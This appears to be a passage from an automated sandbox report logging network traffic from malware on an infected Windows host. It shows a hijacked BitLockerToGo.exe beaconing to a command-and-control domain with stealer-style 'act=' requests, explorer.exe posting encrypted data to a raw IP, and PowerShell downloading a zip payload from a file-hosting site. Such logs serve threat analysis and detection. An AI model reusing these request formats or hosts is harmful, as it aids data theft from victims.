                                                                              2024-07-27 12:53:29 UTC685INData Raw: 41 2b 71 50 43 79 4c 45 74 65 6f 46 58 34 34 6b 78 76 43 61 50 45 55 4e 2b 4e 79 30 66 33 39 68 64 65 34 38 79 38 46 33 6c 52 2b 70 50 49 78 57 37 31 66 57 7a 48 35 69 4b 63 4e 44 39 59 51 37 5a 74 6a 4a 58 48 2b 2b 72 38 4c 35 53 65 6a 43 57 74 39 71 63 45 58 6e 76 38 6c 48 47 6e 68 4c 6e 36 61 44 59 67 49 39 58 4a 53 4f 77 44 38 4b 75 4d 33 69 2b 65 6c 77 72 31 79 79 62 39 70 53 77 44 6e 76 4a 6f 47 39 43 72 74 79 37 6a 32 4a 2f 78 65 54 49 4b 69 63 55 33 47 53 6f 63 4e 46 6d 49 62 4e 6e 6e 2f 31 59 75 67 77 43 76 75 68 4a 6e 55 63 7a 48 6e 66 38 6f 45 31 39 4f 4c 74 46 44 48 32 4d 6b 64 2b 61 74 68 7a 74 6c 43 63 42 33 41 56 48 38 6c 31 30 64 68 4a 51 45 31 38 67 35 55 73 64 49 4a 4e 78 37 53 32 53 6e 42 63 71 5a 61 62 73 55 6d 52 2b 59 51 43 4b 4a 41
                                                                              Data Ascii: A+qPCyLEteoFX44kxvCaPEUN+Ny0f39hde48y8F3lR+pPIxW71fWzH5iKcND9YQ7ZtjJXH++r8L5SejCWt9qcEXnv8lHGnhLn6aDYgI9XJSOwD8KuM3i+elwr1yyb9pSwDnvJoG9Crty7j2J/xeTIKicU3GSocNFmIbNnn/1YugwCvuhJnUczHnf8oE19OLtFDH2Mkd+athztlCcB3AVH8l10dhJQE18g5UsdIJNx7S2SnBcqZabsUmR+YQCKJA


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.449777188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:29 UTC267OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-07-27 12:53:29 UTC808INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=j9vch5rorp0a801hpql02hkaqv; expires=Wed, 20-Nov-2024 06:40:08 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPbvxB2SVfanlU9shTlAPuS%2F12cmHftaKyEzKoNtUZcD1A49Zd36CU5He9x5tkRvGgB252zX77k9QoO90W7wertb7YZaSKwdDrazlyGAzhqi%2B95TFvzdh08JBcSatkqy6K7JB%2FM2hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc5c91cc05e66-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-27 12:53:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-07-27 12:53:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.449778188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:30 UTC268OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 42
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:30 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=bOKHNM--&j=
                                                                              2024-07-27 12:53:30 UTC808INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:30 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=q31b8kgklminklce8vhrp9sddk; expires=Wed, 20-Nov-2024 06:40:09 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbxQPEd7WwyAx8U893hMpuib5Seq%2BCIlzOglgcGBspnNtDImNIMtV0TiOCMTwWAfQDqQUfGAlSoabjn0sntj9oHde4X1jHALcc48yRiChy21JEZLMmayG%2BVKOSgyIyecAcCeeI%2BOoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc5d0cbee8c2d-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-27 12:53:30 UTC561INData Raw: 34 32 32 30 0d 0a 52 6f 34 73 71 6d 37 4a 6c 2f 61 4b 76 6d 76 35 56 6e 39 73 67 65 52 50 61 2f 56 74 65 59 6d 44 67 64 6b 41 2f 38 79 34 72 6f 45 39 72 46 71 49 56 50 32 37 31 50 6e 62 53 63 4d 69 44 52 6e 6b 79 47 30 4b 6b 55 39 44 37 2b 4c 74 71 6d 58 54 37 73 37 44 6f 33 7a 6f 54 63 59 64 72 4c 76 55 37 38 5a 4a 77 77 30 45 54 75 53 4b 62 56 48 58 43 42 50 72 34 75 32 37 59 5a 53 6a 79 4d 4c 69 4c 75 4a 4c 77 67 75 71 38 35 66 6d 30 77 36 63 4d 78 34 47 37 34 30 69 41 35 68 50 56 61 76 6d 2b 2f 73 36 33 59 48 64 32 75 41 4c 37 31 2f 42 54 4c 53 37 6a 61 6a 62 42 64 74 73 58 51 33 6b 68 69 4d 4e 6b 51 59 52 34 65 76 6c 75 6d 53 56 76 4e 48 49 36 53 37 73 53 4d 4d 42 6f 2b 65 61 37 4e 51 46 6d 6a 6b 65 54 71 33 47 4b 68 48 58 56 31 75 34 30 2b 43 71 63
                                                                              Data Ascii: 4220Ro4sqm7Jl/aKvmv5Vn9sgeRPa/VteYmDgdkA/8y4roE9rFqIVP271PnbScMiDRnkyG0KkU9D7+LtqmXT7s7Do3zoTcYdrLvU78ZJww0ETuSKbVHXCBPr4u27YZSjyMLiLuJLwguq85fm0w6cMx4G740iA5hPVavm+/s63YHd2uAL71/BTLS7jajbBdtsXQ3khiMNkQYR4evlumSVvNHI6S7sSMMBo+ea7NQFmjkeTq3GKhHXV1u40+Cqc
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 32 72 6e 76 4c 41 71 58 79 67 71 6a 44 52 34 4a 30 47 67 4b 6a 33 6d 30 48 6b 67 41 4a 36 76 50 6d 74 58 43 52 71 39 7a 42 34 43 72 73 53 38 38 42 70 66 4f 54 36 39 51 4e 6d 6a 6f 52 42 4f 43 43 4c 6b 6e 5a 54 78 7a 7a 6f 62 76 37 55 35 36 71 33 64 37 67 4b 71 78 52 68 68 58 72 38 70 69 6f 68 45 6d 52 4d 68 41 48 36 49 45 6c 42 59 55 45 46 4f 6a 6f 35 4c 31 6f 6e 71 62 51 79 75 30 6c 36 30 76 50 48 71 58 2b 6d 65 76 57 44 39 74 36 58 51 6e 37 78 6e 56 4a 75 51 77 4b 2f 64 50 67 71 6e 50 64 73 5a 54 56 6f 79 50 67 44 70 42 4d 6f 76 32 62 35 64 45 44 6c 54 45 51 42 2b 4b 48 49 41 2b 63 44 68 50 6a 35 65 53 37 5a 70 43 68 31 4d 7a 74 4c 4f 6c 4b 77 67 58 72 75 39 54 76 78 45 6e 44 64 43 30 44 37 34 30 68 53 36 49 4d 46 65 58 6d 39 66 74 39 30 37 65 61 79 2b
                                                                              Data Ascii: 2rnvLAqXygqjDR4J0GgKj3m0HkgAJ6vPmtXCRq9zB4CrsS88BpfOT69QNmjoRBOCCLknZTxzzobv7U56q3d7gKqxRhhXr8piohEmRMhAH6IElBYUEFOjo5L1onqbQyu0l60vPHqX+mevWD9t6XQn7xnVJuQwK/dPgqnPdsZTVoyPgDpBMov2b5dEDlTEQB+KHIA+cDhPj5eS7ZpCh1MztLOlKwgXru9TvxEnDdC0D740hS6IMFeXm9ft907eay+
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 78 51 65 68 2b 4a 44 76 33 55 6e 56 64 42 6f 57 6f 39 35 74 50 34 63 43 46 38 58 71 37 37 49 69 67 75 44 44 6a 4f 51 6f 72 42 61 49 43 4b 66 39 6e 75 66 56 41 35 45 37 46 41 37 72 6a 79 51 4b 6c 77 4d 64 36 75 33 76 74 6d 65 65 71 39 66 4a 34 79 6a 72 53 63 6c 4d 35 62 57 54 38 4a 78 52 32 77 51 51 41 75 69 4b 62 7a 79 55 41 52 58 73 39 36 4f 6b 4c 49 54 75 33 63 43 6a 66 4b 78 42 79 51 47 68 2f 70 72 6b 33 51 6d 66 4e 78 63 4f 37 49 4d 72 41 5a 34 50 43 65 7a 75 34 72 70 70 6c 71 50 55 79 65 49 68 36 77 36 47 54 4b 7a 74 31 4c 43 63 4a 4c 49 4f 58 52 47 74 6e 32 30 4f 6d 30 39 44 71 2b 58 70 75 32 2b 58 70 64 58 50 35 43 72 73 51 38 49 65 6f 2f 57 55 35 74 6f 49 6c 7a 45 63 41 75 43 55 49 51 2b 61 43 52 50 35 6f 61 33 37 5a 59 58 75 67 6f 7a 44 4c 2b 42
                                                                              Data Ascii: xQeh+JDv3UnVdBoWo95tP4cCF8Xq77IiguDDjOQorBaICKf9nufVA5E7FA7rjyQKlwMd6u3vtmeeq9fJ4yjrSclM5bWT8JxR2wQQAuiKbzyUARXs96OkLITu3cCjfKxByQGh/prk3QmfNxcO7IMrAZ4PCezu4rpplqPUyeIh6w6GTKzt1LCcJLIOXRGtn20Om09Dq+Xpu2+XpdXP5CrsQ8Ieo/WU5toIlzEcAuCUIQ+aCRP5oa37ZYXugozDL+B
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 2f 2b 64 34 4e 6f 47 6b 69 59 65 41 75 32 42 49 77 57 5a 41 68 48 6f 37 4b 50 31 49 70 71 32 6d 70 53 6a 43 4f 74 44 35 67 65 6e 38 74 54 33 6b 68 44 62 4d 78 46 4f 75 38 59 68 41 35 73 47 47 2b 4c 6b 36 37 42 72 6d 4b 2f 52 79 65 41 69 34 55 48 42 48 71 48 32 6d 75 76 51 42 5a 30 31 48 68 7a 72 6a 32 31 48 31 77 67 44 71 37 6d 6a 6d 6d 79 51 75 74 33 63 6f 7a 75 69 56 34 67 4c 70 37 58 4d 71 4e 38 49 6c 44 63 63 41 2b 57 50 4a 51 6d 52 43 68 54 6d 37 2b 53 38 59 70 43 67 31 63 72 72 4b 65 42 46 78 67 57 74 39 5a 58 69 6e 45 66 62 4d 77 56 4f 75 38 59 64 43 70 63 50 41 4b 76 2b 72 61 49 69 6d 71 4b 61 6c 4b 4d 32 35 6b 66 49 44 36 54 79 6b 4f 50 51 44 4a 34 37 48 67 66 6d 6a 79 4d 62 6e 67 45 54 34 2b 37 6d 73 47 4b 51 70 4e 62 4d 34 47 53 69 44 73 38 55
                                                                              Data Ascii: /+d4NoGkiYeAu2BIwWZAhHo7KP1Ipq2mpSjCOtD5gen8tT3khDbMxFOu8YhA5sGG+Lk67BrmK/RyeAi4UHBHqH2muvQBZ01Hhzrj21H1wgDq7mjmmyQut3cozuiV4gLp7XMqN8IlDccA+WPJQmRChTm7+S8YpCg1crrKeBFxgWt9ZXinEfbMwVOu8YdCpcPAKv+raIimqKalKM25kfID6TykOPQDJ47HgfmjyMbngET4+7msGKQpNbM4GSiDs8U
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 54 58 42 35 30 6d 47 77 48 71 68 53 34 41 6b 41 63 58 34 65 4c 6b 2b 79 7a 64 71 63 4b 4d 75 32 54 50 57 64 67 42 36 2b 72 61 38 5a 77 4f 6c 33 52 46 54 75 75 4c 4a 51 4f 54 43 42 62 73 35 2b 71 70 61 35 69 67 32 73 6a 6f 4b 2b 70 4b 79 77 79 35 38 35 44 67 33 77 53 57 4f 68 34 4b 6f 38 68 74 44 6f 39 50 51 36 76 54 37 72 56 35 6b 71 6e 4c 78 71 4d 37 6f 6c 65 49 43 36 65 31 7a 4b 6a 59 42 34 6b 2f 48 41 58 6f 69 43 6f 47 6b 67 55 62 35 4f 58 67 74 57 6d 63 72 64 4c 42 37 69 72 6d 52 38 45 4c 70 2f 47 54 71 4a 4a 4a 6e 43 78 64 56 71 4f 74 44 43 53 37 43 41 47 72 2f 71 32 69 49 70 71 69 6d 70 53 6a 4b 4f 56 43 77 67 65 73 2f 35 72 68 30 67 4b 4a 4a 68 34 4b 34 49 38 75 44 70 34 42 47 2b 7a 6b 37 62 78 6a 6c 71 72 51 7a 2b 56 6b 6f 67 37 50 46 4f 75 74 31
                                                                              Data Ascii: TXB50mGwHqhS4AkAcX4eLk+yzdqcKMu2TPWdgB6+ra8ZwOl3RFTuuLJQOTCBbs5+qpa5ig2sjoK+pKywy585Dg3wSWOh4Ko8htDo9PQ6vT7rV5kqnLxqM7oleIC6e1zKjYB4k/HAXoiCoGkgUb5OXgtWmcrdLB7irmR8ELp/GTqJJJnCxdVqOtDCS7CAGr/q2iIpqimpSjKOVCwges/5rh0gKJJh4K4I8uDp4BG+zk7bxjlqrQz+Vkog7PFOut1
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 64 4e 78 59 4c 36 59 63 71 41 5a 6f 64 47 4f 54 75 35 37 74 74 6d 36 6a 62 77 2b 55 6a 35 55 2f 41 43 2b 75 37 31 4f 2f 45 53 63 4e 30 4d 77 6e 67 67 6d 30 57 32 52 5a 62 37 4f 32 6a 34 79 4b 64 70 4e 44 47 37 53 54 72 58 4d 34 46 71 2f 61 47 36 39 6f 42 6e 54 67 52 41 2b 75 50 4c 51 79 63 41 68 44 6d 35 2b 4f 77 59 39 33 67 6d 73 76 37 5a 4c 51 4f 2b 51 47 6c 38 5a 72 72 7a 41 37 62 4b 31 4d 58 6f 34 45 68 53 63 39 50 46 4f 4c 7a 35 4c 35 71 6c 4b 37 55 78 65 6f 6a 36 45 33 4a 43 4b 66 36 6e 65 76 55 43 4a 4d 37 48 67 37 6f 6a 69 63 49 6d 51 70 62 70 61 48 6b 6f 79 4c 46 37 76 58 50 35 69 2f 74 44 4f 38 4b 72 50 6e 55 39 35 49 51 32 7a 4d 52 54 72 76 47 4c 67 32 5a 42 68 54 76 36 2b 53 37 5a 5a 75 75 30 73 66 75 4c 2f 35 4c 78 67 6d 71 39 5a 58 6e 30 41
                                                                              Data Ascii: dNxYL6YcqAZodGOTu57ttm6jbw+Uj5U/AC+u71O/EScN0Mwnggm0W2RZb7O2j4yKdpNDG7STrXM4Fq/aG69oBnTgRA+uPLQycAhDm5+OwY93gmsv7ZLQO+QGl8ZrrzA7bK1MXo4EhSc9PFOLz5L5qlK7Uxeoj6E3JCKf6nevUCJM7Hg7ojicImQpbpaHkoyLF7vXP5i/tDO8KrPnU95IQ2zMRTrvGLg2ZBhTv6+S7ZZuu0sfuL/5Lxgmq9ZXn0A
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 47 4f 44 42 45 7a 65 35 43 42 33 75 35 76 50 35 54 4a 61 36 33 59 79 74 5a 4f 4d 4f 6b 44 58 72 76 64 54 58 6b 6b 6d 44 64 45 56 4f 31 6f 55 6a 42 35 41 5a 43 71 62 50 35 4c 31 6e 6d 72 36 59 34 75 67 77 36 77 36 47 54 4b 32 31 7a 4c 69 53 53 5a 38 6c 58 56 61 7a 31 48 5a 63 78 46 68 4c 75 66 36 74 6f 69 4b 4c 37 6f 4b 65 72 57 54 2b 44 70 42 4d 37 50 61 47 2b 74 6f 4b 6a 54 64 61 4d 4e 32 46 4f 77 53 59 42 42 72 56 33 38 32 32 59 35 36 67 6d 50 33 31 4b 66 78 4e 7a 51 75 56 79 35 72 76 79 41 36 56 4d 68 31 4f 72 63 59 69 53 63 38 32 57 36 4f 68 33 50 55 69 68 65 36 43 6a 4e 59 6e 34 6b 44 50 47 72 71 34 74 2f 37 52 42 70 41 31 58 55 43 6a 67 47 31 52 78 30 46 62 37 2f 43 6a 34 7a 4c 50 39 59 2b 66 74 48 53 2b 55 59 59 56 36 2b 50 55 73 49 35 48 32 79 5a
                                                                              Data Ascii: GODBEze5CB3u5vP5TJa63YytZOMOkDXrvdTXkkmDdEVO1oUjB5AZCqbP5L1nmr6Y4ugw6w6GTK21zLiSSZ8lXVaz1HZcxFhLuf6toiKL7oKerWT+DpBM7PaG+toKjTdaMN2FOwSYBBrV3822Y56gmP31KfxNzQuVy5rvyA6VMh1OrcYiSc82W6Oh3PUihe6CjNYn4kDPGrq4t/7RBpA1XUCjgG1Rx0Fb7/Cj4zLP9Y+ftHS+UYYV6+PUsI5H2yZ
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 32 31 48 31 77 42 62 73 39 69 6a 38 79 4b 69 34 4a 72 55 6f 33 79 73 65 38 73 43 70 66 4b 43 2b 5a 45 75 6c 54 4d 63 47 50 4f 4c 49 53 69 55 48 68 47 72 72 36 4f 39 49 73 58 38 6c 49 7a 6e 4e 61 77 57 6d 46 37 77 6f 4d 65 2f 6a 46 75 45 65 67 52 4f 39 63 5a 31 57 39 6c 50 43 61 75 35 6f 2f 78 68 6a 37 7a 63 7a 2f 55 6e 71 33 44 32 4b 62 7a 32 68 4f 37 66 4e 36 55 66 45 51 6a 6b 6e 43 6f 50 73 53 39 62 70 61 48 73 2b 7a 71 6b 37 70 4b 4d 33 47 71 73 56 6f 68 55 36 38 43 58 35 74 49 4f 6a 53 56 51 4b 2f 53 46 50 51 2b 55 54 31 57 72 35 36 50 6a 4d 74 50 75 33 74 32 6a 66 4c 77 63 6b 31 6e 34 6f 73 53 36 77 30 65 43 64 41 74 4f 75 39 52 6a 53 59 56 50 51 36 75 6d 34 4b 6c 77 6d 36 33 4d 7a 36 51 61 30 6d 6a 4c 48 61 48 55 6d 66 6a 62 4e 36 55 68 48 67 44 74
                                                                              Data Ascii: 21H1wBbs9ij8yKi4JrUo3yse8sCpfKC+ZEulTMcGPOLISiUHhGrr6O9IsX8lIznNawWmF7woMe/jFuEegRO9cZ1W9lPCau5o/xhj7zcz/Unq3D2Kbz2hO7fN6UfEQjknCoPsS9bpaHs+zqk7pKM3GqsVohU68CX5tIOjSVQK/SFPQ+UT1Wr56PjMtPu3t2jfLwck1n4osS6w0eCdAtOu9RjSYVPQ6um4Klwm63Mz6Qa0mjLHaHUmfjbN6UhHgDt
                                                                              2024-07-27 12:53:30 UTC1369INData Raw: 45 4d 58 4e 58 66 78 4b 6c 70 6e 4f 7a 6f 33 4f 67 77 37 30 2f 54 54 6f 76 6c 6d 66 33 4e 44 6f 73 4b 49 7a 6e 79 67 54 31 4c 73 51 77 4e 36 4b 47 74 2b 33 72 64 39 70 72 72 38 53 2f 74 66 4e 67 48 76 2f 61 56 38 2f 77 5a 6c 69 45 4d 43 66 50 47 4d 6b 65 4f 54 77 32 72 75 62 44 31 49 6f 2f 75 67 6f 79 6b 4b 75 46 50 79 77 4b 6f 35 34 62 75 33 78 2b 59 63 79 4d 77 31 34 30 35 43 70 6b 4a 45 4e 58 66 31 4b 70 6c 6a 65 7a 38 7a 2f 55 6e 72 41 43 49 46 4f 75 74 31 4e 7a 58 48 5a 67 36 47 77 57 6a 6d 57 4d 51 31 78 6c 62 73 37 4b 74 2b 33 44 64 39 70 71 4c 37 53 6e 74 54 63 59 50 75 65 65 53 36 38 6f 4b 33 41 6f 6a 49 65 43 63 4f 77 4f 61 41 79 58 56 31 76 4b 38 63 74 2b 49 32 64 72 67 5a 4b 49 4f 30 45 7a 7a 74 62 76 72 78 68 2b 52 4f 52 46 4f 2f 4d 67 30 53
                                                                              Data Ascii: EMXNXfxKlpnOzo3Ogw70/TTovlmf3NDosKIznygT1LsQwN6KGt+3rd9prr8S/tfNgHv/aV8/wZliEMCfPGMkeOTw2rubD1Io/ugoykKuFPywKo54bu3x+YcyMw1405CpkJENXf1Kpljez8z/UnrACIFOut1NzXHZg6GwWjmWMQ1xlbs7Kt+3Dd9pqL7SntTcYPueeS68oK3AojIeCcOwOaAyXV1vK8ct+I2drgZKIO0Ezztbvrxh+RORFO/Mg0S


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.449779107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:30 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:53:30 UTC1122OUTData Raw: 6b 33 49 72 2f 4f 63 52 4d 62 54 2b 75 38 75 6a 72 76 65 72 54 36 71 41 33 75 39 6e 46 6d 75 63 46 52 74 63 4c 78 75 39 6f 72 50 33 38 58 5a 30 32 6f 44 75 44 63 30 75 6b 5a 36 32 42 4e 63 44 78 42 67 66 43 44 6e 72 4a 69 6a 78 61 30 6d 48 51 58 4c 4d 57 57 32 6f 42 39 2b 50 37 46 4c 55 7a 65 79 64 43 47 78 55 69 39 55 37 45 59 47 74 71 36 70 6d 48 48 68 6f 6e 62 6e 35 7a 59 35 69 46 56 4f 43 63 30 35 6b 49 2f 35 6a 68 72 67 47 4a 67 6e 42 2f 46 34 75 78 4c 55 77 34 46 50 48 64 36 6b 4e 2b 6e 5a 73 4b 51 74 2f 6b 51 6e 43 2b 33 4d 2f 35 2f 64 49 42 62 4d 65 63 68 41 68 76 44 57 32 36 66 51 51 61 75 64 2f 48 75 47 38 34 78 53 56 72 44 66 76 6f 31 45 50 6c 32 76 76 30 52 49 74 46 51 32 39 30 32 64 30 34 4a 31 45 55 47 63 57 37 46 54 6b 45 67 63 67 6c 59 73
                                                                              Data Ascii: k3Ir/OcRMbT+u8ujrverT6qA3u9nFmucFRtcLxu9orP38XZ02oDuDc0ukZ62BNcDxBgfCDnrJijxa0mHQXLMWW2oB9+P7FLUzeydCGxUi9U7EYGtq6pmHHhonbn5zY5iFVOCc05kI/5jhrgGJgnB/F4uxLUw4FPHd6kN+nZsKQt/kQnC+3M/5/dIBbMechAhvDW26fQQaud/HuG84xSVrDfvo1EPl2vv0RItFQ2902d04J1EUGcW7FTkEgcglYs
                                                                              2024-07-27 12:53:32 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:32 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:32 UTC685INData Raw: 43 64 68 46 65 72 6e 31 6a 62 51 78 47 54 6d 44 74 32 36 58 55 47 33 53 37 56 36 75 42 65 57 58 42 76 32 42 65 42 70 6b 7a 6a 53 77 45 31 46 54 61 6c 56 36 72 72 6c 54 32 6a 4c 76 2f 50 33 76 42 70 31 44 57 2b 57 6a 61 62 78 6b 54 39 6b 31 43 73 49 50 70 51 7a 69 48 55 62 42 64 77 6b 48 74 41 6a 59 58 51 50 76 64 62 39 73 75 36 35 42 59 52 41 41 4f 37 48 69 4a 37 59 69 37 6d 48 62 69 38 42 59 51 6e 73 79 32 4f 48 4e 4c 4b 57 4d 2f 53 62 6e 4e 75 61 65 4d 79 6b 71 79 52 37 6b 63 4b 31 36 70 72 51 32 32 55 66 30 36 34 67 37 2b 4b 5a 72 76 33 64 52 73 4c 49 43 4f 7a 35 57 42 31 71 77 48 4a 6e 66 2f 42 49 75 43 54 54 67 65 74 4a 68 72 75 31 55 32 45 77 4a 6d 77 65 2b 30 78 55 70 69 46 31 53 34 43 47 68 7a 48 71 6e 48 6b 2f 4d 77 32 73 4d 65 41 79 51 63 61 51
                                                                              Data Ascii: CdhFern1jbQxGTmDt26XUG3S7V6uBeWXBv2BeBpkzjSwE1FTalV6rrlT2jLv/P3vBp1DW+WjabxkT9k1CsIPpQziHUbBdwkHtAjYXQPvdb9su65BYRAAO7HiJ7Yi7mHbi8BYQnsy2OHNLKWM/SbnNuaeMykqyR7kcK16prQ22Uf064g7+KZrv3dRsLICOz5WB1qwHJnf/BIuCTTgetJhru1U2EwJmwe+0xUpiF1S4CGhzHqnHk/Mw2sMeAyQcaQ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.44978031.14.70.2454435900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:30 UTC220OUTGET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: store4.gofile.io
                                                                              Connection: Keep-Alive
                                                                              2024-07-27 12:53:31 UTC577INHTTP/1.1 200 OK
                                                                              Server: nginx/1.27.0
                                                                              Date: Sat, 27 Jul 2024 12:53:31 GMT
                                                                              Content-Type: application/zip
                                                                              Content-Length: 296998
                                                                              Connection: close
                                                                              Accept-Ranges: bytes
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                              Content-Disposition: attachment; filename*=UTF-8''vm.zip
                                                                              Last-Modified: Sat, 20 Jul 2024 15:35:59 GMT
                                                                              2024-07-27 12:53:31 UTC512INData Raw: 50 4b 03 04 14 00 00 00 08 00 dd 74 ee 58 cf a1 af e2 8a 9e 01 00 ff 9f 01 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1e 2c e1 d3 60 9c e8 00 00 00 00 5a b9 e0 9f 01 00 b0 01 30 84 0a 17 00 00 00 02 84 0a 17 00 00 00 e2 f0 81 c7 c8 60 d4 c8 e0 38 d3 0d 6b a8 40 7e 43 42 42 78 45 44 b8 8e c4 f4 26 64 49 c2 fa 90 bd c3 8e 2c 04 65 ca 0c c3 44 33 63 e6 cd 00 1b 15 f2 75 2e 36 08 0d 0d 0d 0d 09 fb e8 2c e7 02 e7 51 1d a5 d6 20 04 61 48 5d 3f 41 9f fb e3 78 8c 57 37 d8 63 1c 04 3b ac 66 fe 55 cd 04 c3 1d cc a6 43 93 5a 4b 8b 57 0a ee dd 76 c6 f0 c4 6f 0b a9 0d b8 52 ab f3 f7 de 75 2d 32 fd d6 ea f7 c9 c6 8c af bf 8a 23 db f4 53 5f 0a f2 0a ef 6d 13 d4 b1 3f 0c f6 df 34 16 d5 4b e0 f1 1b 76 cd 49 6c 55 65 c4 f8 b1 01 f5 86 86 ce fc 44 83 fe 80 f7 d7 52 e7 bf 20
                                                                              Data Ascii: PKtXdata.bin,`Z0`8k@~CBBxED&dI,eD3cu.6,Q aH]?AxW7c;fUCZKWvoRu-2#S_m?4KvIlUeDR
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 33 95 ce 64 b8 6e 4a 63 20 5a 89 ec 08 66 8d 4f d6 f5 94 60 1f 4a 69 7a 91 77 33 98 ce e1 73 f5 64 f9 52 17 f4 ec 11 ff 0d 2b 1b b7 5c 82 b9 83 4d 06 af b5 93 16 93 73 06 4a da 21 57 0e d0 d4 9e e4 fa f7 cb 46 51 28 9c f3 f6 26 d0 6a 7c aa d9 31 b5 3b ff 7d cb 79 6f d4 dd eb ed e7 31 d7 1e 41 6c 9c 8b fc 7f 85 a4 04 36 5d 41 e6 6e 44 2e 2d 14 7e ad 9c 70 7a 7e e5 31 7f c5 00 67 b5 90 1a ea ea ea ea ea ea ea ea e8 e9 e9 e9 e5 e6 e6 e6 e6 e6 e6 e6 e0 13 44 2f 56 22 5c 4e 1d e3 63 a0 71 d0 96 6e 78 69 bc ae ef 38 6c da c7 37 97 5e e2 c0 d1 91 6c de 28 53 5e fb b0 9c 48 d1 02 aa f8 a5 f3 52 1e c6 a3 90 9d ea bc ea 56 12 20 18 75 cb 1f 54 c6 e9 c3 dc eb 37 3b 32 ca d2 da 51 95 29 35 28 8e 30 e1 f1 c9 21 dc f4 12 04 2f f9 89 ad 07 e3 87 16 7a 85 5d d5 e8 2c 01
